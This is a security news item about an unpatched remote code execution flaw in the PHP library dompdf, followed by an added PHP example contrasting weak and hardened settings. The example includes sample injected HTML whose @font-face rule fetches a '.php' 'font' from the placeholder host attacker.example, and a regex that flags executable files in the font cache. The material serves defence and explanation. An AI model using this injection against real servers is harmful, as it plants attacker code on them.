Security News > 2022 > March > Unpatched RCE Bug in dompdf Project Affects HTML to PDF Converters
Researchers have disclosed an unpatched security vulnerability in "Dompdf," a PHP-based HTML to PDF converter, that, if successfully exploited, could lead to remote code execution in certain configurations.
The flaw lets an attacker who can inject HTML into a page before it is rendered to PDF (for example through an XSS vulnerability) reference a remote font file whose name ends in a .php extension; when remote resource loading is enabled, dompdf fetches that file and caches it on the web server under that name, effectively uploading a PHP file into the font directory. This meant that the attacker could potentially navigate to the uploaded.
According to GitHub's dependency statistics, dompdf is used by roughly 59,250 repositories, making it a popular library for generating PDFs in PHP.
Dompdf versions 1.2.0 and prior that are located in a web-accessible directory and have the setting "$isRemoteEnabled" toggled on should be considered vulnerable.
"Security vulnerabilities often occur due to decisions made based on incorrect assumptions about underlying or interconnected components," the researchers said.
"Update dompdf to a recent version and turn off $isRemoteEnabled, if possible for your use case."
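The following is an added example, not code from the article or from the dompdf project. It shows the weak configuration the advisory describes (remote resources enabled) next to a hardened one (remote resources off, font cache kept outside the web root, chroot set), plus a small after-the-fact check for executable files in the font cache. It assumes dompdf is installed via Composer; the hostname attacker.example, the paths /var/lib/dompdf/fonts and /var/www/app/assets, and the function names renderWeak, renderHardened and findSuspiciousFontFiles are placeholders chosen for illustration. The injected HTML is constructed sample input, not a payload from the article.

```php
<?php
// Added example (not from the dompdf project or the article). Assumes a
// Composer-installed dompdf providing Dompdf\Dompdf and Dompdf\Options.
require __DIR__ . '/vendor/autoload.php';

use Dompdf\Dompdf;
use Dompdf\Options;

// Constructed sample input: the kind of markup an XSS flaw could let an
// attacker inject into a page that is later converted to PDF. The @font-face
// rule points at a remote "font" whose filename ends in .php; with remote
// loading enabled, dompdf fetches it and caches it locally under that name.
// attacker.example is a placeholder host.
$injected = <<<'HTML'
<style>
@font-face { font-family: 'x'; src: url('http://attacker.example/font.php'); }
body { font-family: 'x'; }
</style>
<p>invoice</p>
HTML;

// Weak configuration: the setting the advisory calls out, left enabled, with
// dompdf (and therefore its font cache) assumed to live inside the web root.
function renderWeak(string $html): string
{
    $options = new Options();
    $options->set('isRemoteEnabled', true);
    $dompdf = new Dompdf($options);
    $dompdf->loadHtml($html);
    $dompdf->render();
    return $dompdf->output();
}

// Hardened configuration: remote resources disabled so the @font-face URL is
// never fetched; font directory and cache moved to a path the web server does
// not serve; chroot limiting which local files may be referenced at all.
// Both directory paths are assumed values for this example.
function renderHardened(string $html): string
{
    $options = new Options();
    $options->set('isRemoteEnabled', false);
    $fontDir = '/var/lib/dompdf/fonts';          // assumed, outside the web root
    $options->setFontDir($fontDir);
    $options->setFontCache($fontDir);
    $options->setChroot('/var/www/app/assets');  // assumed directory of allowed local assets
    $dompdf = new Dompdf($options);
    $dompdf->loadHtml($html);
    $dompdf->render();
    return $dompdf->output();
}

// Practitioner check: list files in the font cache whose extension a typical
// PHP web server would execute. A real font cache should contain only font
// and cache files, so any hit here deserves investigation.
function findSuspiciousFontFiles(string $fontDir): array
{
    $hits = [];
    foreach (glob($fontDir . '/*') ?: [] as $path) {
        if (preg_match('/\.(php|phtml|phar)$/i', $path)) {
            $hits[] = $path;
        }
    }
    return $hits;
}

// Usage: render with the hardened settings, then inspect the cache directory.
$pdf = renderHardened($injected);
file_put_contents('/tmp/out.pdf', $pdf);
foreach (findSuspiciousFontFiles('/var/lib/dompdf/fonts') as $hit) {
    fwrite(STDERR, "suspicious file in font cache: {$hit}\n");
}
```

Disabling remote loading stops the fetch that places the file on disk; keeping the font directory outside any web-served path means that even a file that does land there cannot be requested and executed through the web server. Apply both rather than relying on one, since the advisory's vulnerable condition is the combination of a web-accessible install and remote loading being on.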
News URL
https://thehackernews.com/2022/03/unpatched-rce-bug-in-dompdf-project.html